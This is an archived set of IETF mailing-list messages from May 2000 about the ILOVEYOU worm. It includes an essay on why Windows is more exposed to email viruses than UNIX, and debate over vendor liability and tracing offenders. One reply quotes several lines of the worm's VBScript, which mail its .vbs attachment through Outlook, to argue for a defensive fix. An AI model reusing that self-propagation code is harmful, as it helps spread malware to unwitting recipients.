Cc: Michael H. Warfield; [EMAIL PROTECTED]; Scot Mc Pherson;
[EMAIL PROTECTED]
Subject: viruses on UNIX vs. Windows
it might be useful to further examine the differences between UNIX-like
systems (including Linux) and Windows systems regarding their
susceptibility to viruses.
1. it should first be noted that UNIX-like systems are not immune to
worms or viruses. the Morris worm propagated itself via buffer
overflow bugs in sendmail and finger, and similar vulnerabilities are
probably still available to a would-be attacker. over the years many
more security holes like these have been found in UNIX systems and
exploited. we'll keep seeing such holes as long as people write
servers in C. but for some reason such attacks tend not to be viruses,
we just haven't seen many worms/viruses use these techniques since the
Morris worm.
2. the Morris worm worked with both vax and sun3 platforms presumably
because these were the most popular platforms then in use on the
Internet. today most viruses target Windows boxes presumably because
they are so popular.
3. the attacks that have been successful against UNIX tend to be specific
to a particular platform - its CPU instruction set, memory layout,
system traps, and library routines. Windows boxes are also vulnerable
to hardware-specific attacks, but they also support things like vbscript.
so there are multiple languages by which one can attack a windows box,
and many of those are commonly bundled with Windows. so in addition
to windows being more popular, in some ways you it has a more
predictable target environment (i.e. a given windows box is likely to
have more facilities you can exploit than a UNIX box) this makes Windows
a more predictable platform for software developers, but virus writers
are software developers too.
4. email-borne viruses have somewhat greater ability to penetrate
private networks because email tends to not be filtered by firewalls
(and even firewalls that scan for viruses generally are limited to
scanning for known viruses)
UNIX-based email clients are less vulnerable than their Windows
counterparts because
a) UNIX-like systems do not come with an extensive registry of content-type
-to- program mappings. nor, in general, do mail readers for these
platforms. so if a mail reader receives an object with an unusual
content-type it is unlikely to know what to do with it (other than
to offer to save it to a file)
b) UNIX based mail readers tend to rely on the MIME content-type
label and are less likely than Windows readers to "guess" how to
handle a file based on the file name suffix. MIME content-type
registrations are required to contain a security considerations
section. it may be that as a result, the content-type registry
on a UNIX system is less likely to contain definitions for
dangerous objects, than on a windows system...and therefore
UNIX mail readers are less likely to try to interpret such things.
c) UNIX systems have fewer interpreters for content-types that
can cause harmful side-effects, and such as do exist (such
as PostScript) are more likely to be invoked in a "safe" mode.
script attacks are certainly possible on UNIX - most UNIX systems
support script languages with destructive power similar to vbscript.
but it is very unlikely that a UNIX mail reader would be configured
to, say, automatically execute a perl script received in mail.
d) UNIX has not traditionally had a point-and-click interface,
so the notion that there is some action implicitly associated
with a file type, so common in the Windows and Mac worlds,
does not hold for UNIX. Indeed, UNIX has much the opposite
notion - that arbitrary tools can be applied to arbitrary files.
5. unlike many Windows-ish boxes, UNIX is a multi user operating
system with file protections. thus there is a layer of isolation
between user processes and the operating system, which limits the
degree of damage that is likely to happen. to be sure, a lot of
harm can be done by trashing or altering a single user's files,
and there may are often security holes which can be exploited
to elevate an ordinary user's privileges. but this is still an
additional barrier that must be overcome. Windows is an easier
target.
6. there is a great deal more history with security exploits,
and thus with countermeasures, on UNIX-like systems.
there seems to be greater awareness of the potential for harm
among the UNIX community than among Windows developers.
this may be because UNIX is primarily used by computer experts.
conclusion:
to some degree Windows is inherently more vulnerable because it
is a more popular platform. however it should be possible to make
Windows much less vulnerable than it currently is merely by a few
countermeasures.
- don't automatically evaluate content unless it is KNOWN to be safe
from harmful side-effects. either that or evaluate the content
only within a sandbox which prevents such harm. (this means
that you limit the content that you're willing to automatically
evaluate to a few well-understood types)
- don't offer to execute content that can cause harm unless
(a) the recipient okays it, (b) the sender's identity is
known and the integrity of the file can be assured
(via verifiable digital signatures), and (c) the recipient
is warned *each time* that the content can cause harm.
Keith
------_=_NextPart_001_01BFB767.9A280CF6
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
charset=3Diso-8859-1">
<META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version =
5.5.2651.65">
<TITLE>RE: viruses on UNIX vs. Windows </TITLE>
</HEAD>
<BODY>
<P><FONT SIZE=3D2>Keith (& all),</FONT>
</P>
<P><FONT SIZE=3D2>Very interesting considerations, I subscribe your =
point of view. You can imagine when MS will be splitted (may be not in =
the near future, let's say within 3/4 years), the new company, let's =
call it "GateSoft", will release "GateSoft Office 2003 =
for </FONT></P>
<P><FONT SIZE=3D2>L-I-U-nix (Linux + Unix HP and Solaris)". =
</FONT>
<BR><FONT SIZE=3D2>The Visual Basic engine will be available also in =
the "protected" and "perfect" world. How many time =
you installed software on a Linux/Unix machine and instead of getting =
the very famous error messages, the application was simply not working =
... </FONT></P>
<P><FONT SIZE=3D2>core dumped !</FONT>
<BR><FONT SIZE=3D2>( I just got another example two days ago!!! Don't =
ask me witch is the program ! I have the answer!!)</FONT>
<BR><FONT SIZE=3D2>Everybody knows the difference in terms of pricing =
between Win-based system and Unix environment, I mean globally Hardware =
and Software.</FONT></P>
<P><FONT SIZE=3D2>Linux is, in this aspect, not involved; it is just =
the lack of Software limiting the diffusion; talking about the Hardware =
there requirements are quite convenient.</FONT></P>
<P><FONT SIZE=3D2>The alternative will appear not the ideal solution =
when it will use the MOST COMMON SOFTWARE SOLUTION diffused on this =
planet: this is the "cruel" reality.</FONT></P>
<P><FONT SIZE=3D2>I have a question you all: </FONT>
<BR><FONT SIZE=3D2>Is the JAVA environment ideal for creating worms and =
horses ? </FONT>
<BR><FONT SIZE=3D2>Are there any security holes ? </FONT>
<BR><FONT SIZE=3D2>If the programmer build a nice windows asking the =
user if they would like to continue or not, is it possible to =
manipulate files on the Computer or attach into the System =
scripts/registry malicious lines ?</FONT></P>
<P><FONT SIZE=3D2>If the answer are all YES, Java is the ideal tool for =
creating viruses for the Linux/Unix world. The complexity, in terms of =
programming, of Java is not really far from the VB Scripting. The last =
one is the method used by millions of PC users in the </FONT></P>
<P><FONT SIZE=3D2>Internet Community.</FONT>
</P>
<P><FONT SIZE=3D2>\GianPietro</FONT>
</P>
<P><FONT SIZE=3D2>-----Original Message-----</FONT>
<BR><FONT SIZE=3D2>From: Keith Moore [<A =
HREF=3D"mailto:[EMAIL PROTECTED]">mailto:[EMAIL PROTECTED]</A>]</FONT>
<BR><FONT SIZE=3D2>Sent: Saturday, May 06, 2000 12:00 AM</FONT>
<BR><FONT SIZE=3D2>To: Randall Stewart</FONT>
<BR><FONT SIZE=3D2>Cc: Michael H. Warfield; [EMAIL PROTECTED]; =
Scot Mc Pherson;</FONT>
<BR><FONT SIZE=3D2>[EMAIL PROTECTED]</FONT>
<BR><FONT SIZE=3D2>Subject: viruses on UNIX vs. Windows </FONT>
</P>
<BR>
<P><FONT SIZE=3D2>it might be useful to further examine the differences =
between UNIX-like</FONT>
<BR><FONT SIZE=3D2>systems (including Linux) and Windows systems =
regarding their </FONT>
<BR><FONT SIZE=3D2>susceptibility to viruses. </FONT>
</P>
<P><FONT SIZE=3D2>1. it should first be noted that UNIX-like systems =
are not immune to </FONT>
<BR><FONT SIZE=3D2>worms or viruses. the Morris worm propagated =
itself via buffer</FONT>
<BR><FONT SIZE=3D2>overflow bugs in sendmail and finger, and similar =
vulnerabilities are</FONT>
<BR><FONT SIZE=3D2>probably still available to a would-be =
attacker. over the years many </FONT>
<BR><FONT SIZE=3D2>more security holes like these have been found in =
UNIX systems and </FONT>
<BR><FONT SIZE=3D2>exploited. we'll keep seeing such holes as =
long as people write </FONT>
<BR><FONT SIZE=3D2>servers in C. but for some reason such attacks =
tend not to be viruses,</FONT>
<BR><FONT SIZE=3D2>we just haven't seen many worms/viruses use these =
techniques since the </FONT>
<BR><FONT SIZE=3D2>Morris worm.</FONT>
</P>
<P><FONT SIZE=3D2>2. the Morris worm worked with both vax and sun3 =
platforms presumably</FONT>
<BR><FONT SIZE=3D2>because these were the most popular platforms =
then in use on the </FONT>
<BR><FONT SIZE=3D2>Internet. today most viruses target Windows =
boxes presumably because</FONT>
<BR><FONT SIZE=3D2>they are so popular.</FONT>
</P>
<P><FONT SIZE=3D2>3. the attacks that have been successful against UNIX =
tend to be specific </FONT>
<BR><FONT SIZE=3D2>to a particular platform - its CPU instruction set, =
memory layout,</FONT>
<BR><FONT SIZE=3D2>system traps, and library routines. Windows =
boxes are also vulnerable </FONT>
<BR><FONT SIZE=3D2>to hardware-specific attacks, but they also support =
things like vbscript. </FONT>
<BR><FONT SIZE=3D2>so there are multiple languages by which one can =
attack a windows box, </FONT>
<BR><FONT SIZE=3D2>and many of those are commonly bundled with =
Windows. so in addition</FONT>
<BR><FONT SIZE=3D2>to windows being more popular, in some ways you it =
has a more </FONT>
<BR><FONT SIZE=3D2>predictable target environment (i.e. a given windows =
box is likely to</FONT>
<BR><FONT SIZE=3D2>have more facilities you can exploit than a UNIX =
box) this makes Windows </FONT>
<BR><FONT SIZE=3D2>a more predictable platform for software developers, =
but virus writers </FONT>
<BR><FONT SIZE=3D2>are software developers too.</FONT>
</P>
<P><FONT SIZE=3D2>4. email-borne viruses have somewhat greater ability =
to penetrate </FONT>
<BR><FONT SIZE=3D2>private networks because email tends to not be =
filtered by firewalls</FONT>
<BR><FONT SIZE=3D2>(and even firewalls that scan for viruses generally =
are limited to</FONT>
<BR><FONT SIZE=3D2>scanning for known viruses)</FONT>
</P>
<P><FONT SIZE=3D2>UNIX-based email clients are less vulnerable than =
their Windows</FONT>
<BR><FONT SIZE=3D2>counterparts because</FONT>
</P>
<P><FONT SIZE=3D2>a) UNIX-like systems do not come with an extensive =
registry of content-type </FONT>
<BR><FONT SIZE=3D2> -to- program mappings. nor, in =
general, do mail readers for these </FONT>
<BR><FONT SIZE=3D2> platforms. so if a mail reader =
receives an object with an unusual </FONT>
<BR><FONT SIZE=3D2> content-type it is unlikely to know =
what to do with it (other than </FONT>
<BR><FONT SIZE=3D2> to offer to save it to a file)</FONT>
</P>
<P><FONT SIZE=3D2>b) UNIX based mail readers tend to rely on the MIME =
content-type</FONT>
<BR><FONT SIZE=3D2> label and are less likely than Windows =
readers to "guess" how to</FONT>
<BR><FONT SIZE=3D2> handle a file based on the file name =
suffix. MIME content-type</FONT>
<BR><FONT SIZE=3D2> registrations are required to contain a =
security considerations </FONT>
<BR><FONT SIZE=3D2> section. it may be that as a =
result, the content-type registry </FONT>
<BR><FONT SIZE=3D2> on a UNIX system is less likely to =
contain definitions for </FONT>
<BR><FONT SIZE=3D2> dangerous objects, than on a windows =
system...and therefore</FONT>
<BR><FONT SIZE=3D2> UNIX mail readers are less likely to =
try to interpret such things.</FONT>
</P>
<P><FONT SIZE=3D2>c) UNIX systems have fewer interpreters for =
content-types that</FONT>
<BR><FONT SIZE=3D2> can cause harmful side-effects, and =
such as do exist (such</FONT>
<BR><FONT SIZE=3D2> as PostScript) are more likely to be =
invoked in a "safe" mode. </FONT>
</P>
<P><FONT SIZE=3D2> script attacks are certainly possible on =
UNIX - most UNIX systems</FONT>
<BR><FONT SIZE=3D2> support script languages with =
destructive power similar to vbscript.</FONT>
<BR><FONT SIZE=3D2> but it is very unlikely that a UNIX =
mail reader would be configured</FONT>
<BR><FONT SIZE=3D2> to, say, automatically execute a perl =
script received in mail.</FONT>
</P>
<P><FONT SIZE=3D2>d) UNIX has not traditionally had a point-and-click =
interface,</FONT>
<BR><FONT SIZE=3D2> so the notion that there is some action =
implicitly associated</FONT>
<BR><FONT SIZE=3D2> with a file type, so common in the =
Windows and Mac worlds,</FONT>
<BR><FONT SIZE=3D2> does not hold for UNIX. Indeed, =
UNIX has much the opposite</FONT>
<BR><FONT SIZE=3D2> notion - that arbitrary tools can be =
applied to arbitrary files.</FONT>
</P>
<P><FONT SIZE=3D2>5. unlike many Windows-ish boxes, UNIX is a multi =
user operating</FONT>
<BR><FONT SIZE=3D2> system with file protections. =
thus there is a layer of isolation </FONT>
<BR><FONT SIZE=3D2> between user processes and the =
operating system, which limits the </FONT>
<BR><FONT SIZE=3D2> degree of damage that is likely to =
happen. to be sure, a lot of </FONT>
<BR><FONT SIZE=3D2> harm can be done by trashing or =
altering a single user's files, </FONT>
<BR><FONT SIZE=3D2> and there may are often security holes =
which can be exploited </FONT>
<BR><FONT SIZE=3D2> to elevate an ordinary user's =
privileges. but this is still an </FONT>
<BR><FONT SIZE=3D2> additional barrier that must be =
overcome. Windows is an easier</FONT>
<BR><FONT SIZE=3D2> target.</FONT>
</P>
<P><FONT SIZE=3D2>6. there is a great deal more history with security =
exploits,</FONT>
<BR><FONT SIZE=3D2> and thus with countermeasures, on =
UNIX-like systems.</FONT>
</P>
<P><FONT SIZE=3D2> there seems to be greater awareness of =
the potential for harm</FONT>
<BR><FONT SIZE=3D2> among the UNIX community than among =
Windows developers.</FONT>
<BR><FONT SIZE=3D2> this may be because UNIX is primarily =
used by computer experts.</FONT>
</P>
<P><FONT SIZE=3D2>conclusion:</FONT>
</P>
<P><FONT SIZE=3D2>to some degree Windows is inherently more vulnerable =
because it</FONT>
<BR><FONT SIZE=3D2>is a more popular platform. however it should =
be possible to make </FONT>
<BR><FONT SIZE=3D2>Windows much less vulnerable than it currently is =
merely by a few </FONT>
<BR><FONT SIZE=3D2>countermeasures.</FONT>
</P>
<P><FONT SIZE=3D2>- don't automatically evaluate content unless it is =
KNOWN to be safe</FONT>
<BR><FONT SIZE=3D2> from harmful side-effects. either that =
or evaluate the content</FONT>
<BR><FONT SIZE=3D2> only within a sandbox which prevents such =
harm. (this means</FONT>
<BR><FONT SIZE=3D2> that you limit the content that you're =
willing to automatically</FONT>
<BR><FONT SIZE=3D2> evaluate to a few well-understood =
types)</FONT>
</P>
<P><FONT SIZE=3D2>- don't offer to execute content that can cause harm =
unless </FONT>
<BR><FONT SIZE=3D2> (a) the recipient okays it, (b) the sender's =
identity is</FONT>
<BR><FONT SIZE=3D2> known and the integrity of the file can =
be assured</FONT>
<BR><FONT SIZE=3D2> (via verifiable digital signatures), and (c) =
the recipient</FONT>
<BR><FONT SIZE=3D2> is warned *each time* that the content can =
cause harm.</FONT>
</P>
<BR>
<P><FONT SIZE=3D2>Keith</FONT>
</P>
</BODY>
</HTML>
------_=_NextPart_001_01BFB767.9A280CF6--
>From owner-ietf-outbound Sun May 7 09:20:37 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA08094
for [EMAIL PROTECTED]; Sun, 7 May 2000 09:20:02 -0400 (EDT)
Received: from jake.akitanet.co.uk (jake.akitanet.co.uk [212.1.130.131])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA08066
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 09:11:26 -0400 (EDT)
Received: from ppp-10a-42.3com.telinco.net ([212.159.146.42] helo=akitanet.co.uk)
by jake.akitanet.co.uk with esmtp (Exim 3.13 #3)
id 12oQpz-0009Rf-00; Sun, 07 May 2000 14:11:11 +0100
Message-ID: <[EMAIL PROTECTED]>
Date: Sun, 07 May 2000 14:12:53 +0100
From: Paul Robinson <[EMAIL PROTECTED]>
Organization: Akitanet
X-Mailer: Mozilla 4.7 [en]C-CCK-MCD (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: "Gazal, Elly" <[EMAIL PROTECTED]>
CC: IETF <[EMAIL PROTECTED]>
Subject: Re: ILOVEYOU
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
"Gazal, Elly" wrote:
>
> kindly check the attached LOVELETTER coming from me.
Just in case you hadn't noticed, and nobody else had told you, you've
just sent out the ILUVYOU (mangled to get through mail filters) virus
out to [EMAIL PROTECTED] anybody else reading this might be advised (if
you're not aware already) that opening the attatchment is a Bad
Thing(tm) if you're using anything that can understand VBScript....
(like Windows for example... :-) )
--
Paul Robinson - Developer/Sys Admin @ Akitanet http://www.akitanet.co.uk
------------------------------------------------------------------------
Sales: T:+44 (0)1869 337088 F:+44 (0)1869 337488 E:[EMAIL PROTECTED]
Techs: T:+44 (0)161 228 6388 F:+44 (0)161 228 6387 E:[EMAIL PROTECTED]
------------------------------------------------------------------------
>From owner-ietf-outbound Sun May 7 09:40:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA08387
for [EMAIL PROTECTED]; Sun, 7 May 2000 09:40:02 -0400 (EDT)
Received: from shell9.ba.best.com ([EMAIL PROTECTED] [206.184.139.140])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA08336
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 09:35:44 -0400 (EDT)
Received: (from bovik@localhost)
by shell9.ba.best.com (8.9.3/8.9.2/best.sh) id GAA29907;
Sun, 7 May 2000 06:35:16 -0700 (PDT)
Date: Sun, 7 May 2000 06:35:16 -0700 (PDT)
From: "James P. Salsman" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: cure: queue as draft when "Send" called (was Re: ILOVEYOU)
X-Loop: [EMAIL PROTECTED]
"spyder" wrote:
>...
> set regedit=CreateObject("WScript.Shell")
> set out=WScript.CreateObject("Outlook.Application")
> set mapi=out.GetNameSpace("MAPI")
>...
> set male=out.CreateItem(0)
> male.Recipients.Add(malead)
> male.Subject = "ILOVEYOU"
> male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
> male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
> male.Send
One solution is to boycott Outlook until MAPI's Send simply queues the
messages as drafts without sending them. Suggesting that within Cisco
shortly after the melissa worm, which I had to personally clean up after,
I was told that was a "strategic" decision and henceforth I was only to
make "tactical" recommendations. Whoops!
People need to learn to stand up to bad engineering, and bad management
decisions in favor of bad engineering. As a corallary, people need to
support good engineering, such as device upload in HTML:
http://www.sourcexchange.com/WishDetail?wishID=227
Cheers,
James
>From owner-ietf-outbound Sun May 7 11:20:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA09212
for [EMAIL PROTECTED]; Sun, 7 May 2000 11:20:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA09189
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 11:17:43 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id LAA21106;
Sun, 7 May 2000 11:17:42 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: Jacob Palme <[EMAIL PROTECTED]>
cc: IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Sun, 07 May 2000 12:06:36 +0200."
<v04210100b53aef547bba@[130.237.150.138]>
Date: Sun, 07 May 2000 11:17:42 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
Jacob,
in my mind the people most responsible for the viruses are those who
built systems that were so easily compromised.
we don't need protocol support to track them down.
Keith
>From owner-ietf-outbound Sun May 7 12:00:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA09481
for [EMAIL PROTECTED]; Sun, 7 May 2000 12:00:02 -0400 (EDT)
Received: from unni.dsv.su.se (unni.dsv.su.se [130.237.161.27])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA09437
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 11:57:56 -0400 (EDT)
Received: from [130.237.150.138] (jph1.dsv.su.se [130.237.150.138])
by unni.dsv.su.se (8.9.3+Sun/8.9.3) with ESMTP
id RAA16863 for <[EMAIL PROTECTED]>;
Sun, 7 May 2000 17:57:55 +0200 (MET DST)
Mime-Version: 1.0
Message-Id: <v0421010eb53b3e500a1b@[130.237.150.138]>
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Date: Sun, 7 May 2000 17:55:19 +0200
To: IETF general mailing list <[EMAIL PROTECTED]>
From: Jacob Palme <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
At 11.17 -0400 0-05-07, Keith Moore wrote:
> in my mind the people most responsible for the viruses are those who
> built systems that were so easily compromised.
>
> we don't need protocol support to track them down.
That is certainly one factor of importance. But even the
best systems can be compromised, and crimes directly using
the Internet, such as ping overloads, mail bombing, using
vulnerabilities like buffer overlow, etc., do occur. Also,
designing systems which are more safe from viruses may be
systems which are less user-friendly. For example, I have
set my MS Office programs to always ask me before running a
macro in an unkown file in it. The advantage is less risk for
viruses, but the disadvantage is that I have to OK those
questions from MS Office of whether to accept macros. And
if they occur too open, there is a risk that I click "yes"
before thinking through the risk of doing this.
The general view in the Internet community seems to be that
the rights to privacy and anonymity are more important than
catching the increasing amount of criminality on the net.
But would it not be possible to design methods which
protects privacy and anonymity and still makes it possible
to catch criminals. Privacy and anonymity should be
preserved as long as people use them for legal activities.
If, however, they commit crimes, like spreading viruses,
mail bombing, ping overload, etc., are they still entitled
to privacy and anonymity? Can we design logging and tracing
methods which are protected so that they cannot be used
without cause.
I do not know about the laws in the U.S.A., but in my
country, Sweden, police are allowed to perform wiretapping
and electronic eavesdropping only by decision of a court,
and only when there is reason to believe the someone has
committed a crime with a penalty of at least two years in
prison. Could not the methods of catching criminals on the
Internet be protected by similar safeguards? Could not the
tracing and logging be protected by crypthographic
authorisation which only allows their use in proper ways?
This may be a difference in culture. Compared to my own
home country, Sweden, people in the U.S. seem to be very
paranoic in their view of public law enforcement. This
may be because public law enforcement agencies abuse their
privileges more in your country. Or it may be that people
in Sweden are so accustomed to government control that
they do not react?
--
Jacob Palme <[EMAIL PROTECTED]> (Stockholm University and KTH)
for more info see URL: http://www.dsv.su.se/jpalme/
>From owner-ietf-outbound Sun May 7 12:50:25 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA09793
for [EMAIL PROTECTED]; Sun, 7 May 2000 12:50:02 -0400 (EDT)
Received: from A4.JCK.COM (ns.jck.com [209.187.148.211])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA09738
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 12:43:01 -0400 (EDT)
Received: from P2 ("port 1278"@[209.187.148.217])
by a4.jck.com (PMDF V6.0-23 #40360) with ESMTP id <[EMAIL PROTECTED]>
for [EMAIL PROTECTED]; Sun, 07 May 2000 12:43:53 -0400 (EDT)
Date: Sun, 07 May 2000 12:43:00 -0400
From: John C Klensin <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
In-reply-to: <[EMAIL PROTECTED]>
To: Keith Moore <[EMAIL PROTECTED]>
Cc: Jacob Palme <[EMAIL PROTECTED]>, IETF general mailing list <[EMAIL PROTECTED]>
Message-id: <4220640848.957703380@P2>
MIME-version: 1.0
X-Mailer: Mulberry/2.0.0 (Win32)
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7bit
Content-disposition: inline
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
--On Sunday, 07 May, 2000 11:17 -0400 Keith Moore
<[EMAIL PROTECTED]> wrote:
> in my mind the people most responsible for the viruses are
> those who built systems that were so easily compromised.
>
> we don't need protocol support to track them down.
Keith,
This is a difficult issue and, IMO, a slippery slope. I want
to agree with you, I really do, partially because I believe that
it is a really bad idea for organizations to ship software with
all security controls off by default, especially if there is no
really easy way to enable those controls, and that companies
that do so should take responsibility for the consequences.
However, in the more general case, if one takes the position
that, if I build a dangerous-but-useful tool and someone misuses
it, I should be held responsible, we are going to end up with
rules against a lot of very useful stuff including, in extreme
cases, many open source environments.
While this situation has not changed my feelings about the Raven
outcome any more than it has yours, this is probably not a good
situation about which to get simplistic.
john
>From owner-ietf-outbound Sun May 7 13:00:10 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA09922
for [EMAIL PROTECTED]; Sun, 7 May 2000 13:00:02 -0400 (EDT)
Received: from shell5.ba.best.com ([EMAIL PROTECTED] [206.184.139.136])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA09770
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 12:49:28 -0400 (EDT)
Received: (from gds@localhost)
by shell5.ba.best.com (8.9.3/8.9.2/best.sh) id JAA05376;
Sun, 7 May 2000 09:49:19 -0700 (PDT)
Date: Sun, 7 May 2000 09:49:19 -0700 (PDT)
From: Greg Skinner <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
X-Loop: [EMAIL PROTECTED]
Keith Moore <[EMAIL PROTECTED]> wrote:
> but sooner or later folks are going to be held liable for poor engineering
> or poor implementation of networking software, just like folks today can be
> held liable for poor engineering or implementation of bridges or buildings.
I don't see how, as long as the software manufacturers ship the software
with legal disclaimers, e.g. "We are not responsible for damages ..."
Also, bridges and buildings are built by licensed professionals, for the
most part. Comparatively speaking, very few software professionals are
licensed in this way. They do accept responsibility for damages; said
responsibility is factored into the cost of the bridge or building.
[Generalization] Much software is cheap and sold in bulk as a commodity.
If for some reason software became significantly more expensive that would
limit its spread and growth. We would no longer have the thriving
industry we have now.
--gregbo
>From owner-ietf-outbound Sun May 7 13:10:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA10104
for [EMAIL PROTECTED]; Sun, 7 May 2000 13:10:03 -0400 (EDT)
Received: from marcos.networkcs.com (marcos.networkcs.com [137.66.16.1])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA09831
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 12:51:24 -0400 (EDT)
Received: from us.networkcs.com (us.networkcs.com [137.66.11.15])
by marcos.networkcs.com (8.9.3/8.9.3) with ESMTP id LAA18338
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 11:51:25 -0500 (CDT)
(envelope-from [EMAIL PROTECTED])
Received: (from salo@localhost)
by us.networkcs.com (8.9.2/8.9.2) id LAA80809
for [EMAIL PROTECTED]; Sun, 7 May 2000 11:51:24 -0500 (CDT)
(envelope-from salo)
Date: Sun, 7 May 2000 11:51:24 -0500 (CDT)
From: Tim Salo <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-Reply-To: <v0421010eb53b3e500a1b@[130.237.150.138]>
X-Loop: [EMAIL PROTECTED]
> Date: Sun, 7 May 2000 17:55:19 +0200
> To: IETF general mailing list <[EMAIL PROTECTED]>
> From: Jacob Palme <[EMAIL PROTECTED]>
> Subject: Re: VIRUS WARNING
> [...]
> I have
> set my MS Office programs to always ask me before running a
> macro in an unkown file in it. The advantage is less risk for
> viruses, but the disadvantage is that I have to OK those
> questions from MS Office of whether to accept macros. And
> if they occur too open, there is a risk that I click "yes"
> before thinking through the risk of doing this.
> [...]
Other disadvantages include:
o You have very little basis upon which to make a decision. You
can decide based upon whether you trust the sender (which isn't
much to go on, as shown by the recent batch of Outlook viruses),
but you can't decide based on whether the macro might damage
your system.
o Once you click "yes", there is apparently little limit to the
damage that the macro can do, (if it isn't executing in a well-
constructed sandbox).
-tjs
>From owner-ietf-outbound Sun May 7 14:10:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA10695
for [EMAIL PROTECTED]; Sun, 7 May 2000 14:10:02 -0400 (EDT)
Received: from postfix3.free.fr ([EMAIL PROTECTED] [212.27.32.22])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA10655
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 14:06:25 -0400 (EDT)
Received: from portable (paris11-nas4-46-55.dial.proxad.net [212.27.46.55])
by postfix3.free.fr (Postfix) with SMTP id 4048786D05
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 20:06:26 +0200 (CEST)
Message-ID: <001401bfb84e$2cf86760$372e1bd4@portable>
From: "Kajebko" <[EMAIL PROTECTED]>
To: "IETF" <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Subject: Re: ILOVEYOU
Date: Sun, 7 May 2000 20:00:47 +0200
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
X-Loop: [EMAIL PROTECTED]
Learn how to make a virus ;)
Just rename ***.TXT.vbs -> ***.TXT (right click and 'rename',don't double
click on the name...)
----- Original Message -----
From: Paul Robinson <[EMAIL PROTECTED]>
To: Gazal, Elly <[EMAIL PROTECTED]>
Cc: IETF <[EMAIL PROTECTED]>
Sent: Sunday, May 07, 2000 3:12 PM
Subject: Re: ILOVEYOU
> "Gazal, Elly" wrote:
> >
> > kindly check the attached LOVELETTER coming from me.
>
> Just in case you hadn't noticed, and nobody else had told you, you've
> just sent out the ILUVYOU (mangled to get through mail filters) virus
> out to [EMAIL PROTECTED] anybody else reading this might be advised (if
> you're not aware already) that opening the attatchment is a Bad
> Thing(tm) if you're using anything that can understand VBScript....
> (like Windows for example... :-) )
>
> --
> Paul Robinson - Developer/Sys Admin @ Akitanet http://www.akitanet.co.uk
> ------------------------------------------------------------------------
> Sales: T:+44 (0)1869 337088 F:+44 (0)1869 337488 E:[EMAIL PROTECTED]
> Techs: T:+44 (0)161 228 6388 F:+44 (0)161 228 6387 E:[EMAIL PROTECTED]
> ------------------------------------------------------------------------
>
>
>From owner-ietf-outbound Sun May 7 14:20:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA10915
for [EMAIL PROTECTED]; Sun, 7 May 2000 14:20:02 -0400 (EDT)
Received: from mauve.innosoft.com (DSL107-055.brandx.net [209.55.107.55])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA10881
